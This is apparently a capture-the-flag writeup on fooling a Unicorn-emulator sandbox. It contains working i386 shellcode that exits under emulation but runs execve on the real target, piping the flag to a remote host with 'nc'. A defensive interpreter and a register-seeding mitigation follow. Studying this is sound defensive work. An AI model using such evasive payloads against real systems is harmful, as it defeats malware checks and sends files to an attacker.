When Unicorn starts, every register is 0, but in the real world it is not.
We found that ecx is 0x100 when our payload starts, so we can write some odd-looking arithmetic that maps ecx = 0x0 to eax = 0x1 (sys_exit) and at the same time maps ecx = 0x100 to eax = 11 (sys_execve): the emulator sees a harmless exit, the real target runs execve.
```python
from pwn import *
from base64 import b64encode

context(log_level='info', arch='i386')

ip = '<my_vps_ip>'
# ip = '127.0.0.1'
output_port = 11002
cmd = 'cat flag | nc {} {}'.format(ip, output_port)

op = ''
# Derive the syscall number from ecx: eax = (ecx >> 5) + (ecx >> 7) + 1.
# ecx is 0x100 in the real world  -> 8 + 2 + 1 = 11 (sys_execve)
# ecx is 0x0 in the unicorn simulator -> 0 + 0 + 1 = 1 (sys_exit)
op += '\n'.join([
    'mov eax, ecx',
    'sar eax, 5',
    'mov ebx, ecx',
    'sar ebx, 7',
    'add eax, ebx',
    'add eax, 1',
]) + '\n'
# ebx = pointer to the "/bin/bash" string on the stack
op += shellcraft.pushstr('/bin/bash')
op += 'mov ebx, esp\n'
# ecx = argv array for execve
op += shellcraft.pushstr_array('ecx', ['/bin/bash', '-c', cmd])
# edx = NULL envp, then issue the syscall
op += '\n'.join([
    'xor edx, edx',
    'int 0x80',
]) + '\n'
print(op)
send_content = b64encode(asm(op))
print(send_content)
```
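The sandbox-side lesson is that a single run with zero-initialised registers cannot tell what this prologue will do on real hardware. The following added example (not part of the original writeup, and not Unicorn itself) is a tiny interpreter for the six `mov`/`sar`/`add` instructions above; it evaluates the prologue under several starting values of ecx and reports the distinct syscall numbers reached. A checker that sees more than one number knows the verdict depends on register defaults. The interpreter, the `run_prologue`/`syscall_number`/`environment_sensitive` names and the sample ecx values are my own constructions.

```python
# Added example: evaluate the register-arithmetic prologue from the writeup
# under different initial register states, the way a hardened sandbox check
# would, instead of trusting a single all-zero run.

MASK32 = 0xFFFFFFFF

def to_signed32(v):
    """Interpret a 32-bit pattern as a signed value (needed for 'sar')."""
    v &= MASK32
    return v - (1 << 32) if v & 0x80000000 else v

def run_prologue(instrs, init_regs):
    """Execute 'mov/sar/add dst, src' lines on 32-bit registers.
    src may be a register name or an immediate; '#' starts a comment."""
    regs = {'eax': 0, 'ebx': 0, 'ecx': 0, 'edx': 0}
    regs.update(init_regs)
    for line in instrs:
        line = line.split('#', 1)[0].strip()
        if not line:
            continue
        mnemonic, operands = line.split(None, 1)
        dst, src = [o.strip() for o in operands.split(',')]
        val = regs[src] if src in regs else int(src, 0)
        if mnemonic == 'mov':
            regs[dst] = val & MASK32
        elif mnemonic == 'add':
            regs[dst] = (regs[dst] + val) & MASK32
        elif mnemonic == 'sar':
            # arithmetic shift: sign bit is preserved
            regs[dst] = (to_signed32(regs[dst]) >> val) & MASK32
        else:
            raise ValueError('unsupported instruction: ' + mnemonic)
    return regs

# The prologue exactly as it appears in the payload above.
PROLOGUE = [
    'mov eax, ecx',
    'sar eax, 5',
    'mov ebx, ecx',
    'sar ebx, 7',
    'add eax, ebx',
    'add eax, 1',
]

SYSCALL_NAMES = {1: 'sys_exit', 11: 'sys_execve'}

def syscall_number(initial_ecx):
    """The i386 syscall number (eax) left by the prologue for a starting ecx."""
    return run_prologue(PROLOGUE, {'ecx': initial_ecx})['eax']

def environment_sensitive(initial_states):
    """Set of distinct syscall numbers reached across the given starting
    ecx values. More than one entry means the sandbox verdict depends on
    register defaults, which a single zero-initialised run cannot detect."""
    return {syscall_number(ecx) for ecx in initial_states}

if __name__ == '__main__':
    for ecx in (0x0, 0x100):   # constructed sample states: emulator vs. real process
        n = syscall_number(ecx)
        print('ecx=%#x -> eax=%d (%s)' % (ecx, n, SYSCALL_NAMES.get(n, 'other')))
    reached = environment_sensitive([0x0, 0x100, 0x7ff])
    print('distinct syscall numbers:', sorted(reached))
```

Running it with ecx = 0 yields 1 (sys_exit) and with ecx = 0x100 yields 11 (sys_execve), so the set of reached syscalls has more than one member and the payload is flagged as environment-sensitive. The practical mitigation this illustrates is to seed the emulator's registers with the values the real loader would leave (or to fuzz several seeds) before trusting its verdict.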